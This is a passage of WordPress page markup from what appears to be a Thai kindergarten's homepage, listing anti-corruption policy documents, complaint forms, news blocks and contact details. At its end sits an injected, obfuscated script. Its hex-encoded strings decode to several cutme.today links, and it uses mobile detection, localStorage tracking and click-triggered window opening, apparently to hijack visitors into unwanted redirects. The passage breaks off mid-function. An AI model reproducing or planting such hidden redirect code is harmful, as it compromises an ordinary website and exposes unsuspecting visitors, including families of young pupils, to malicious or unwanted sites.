data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return 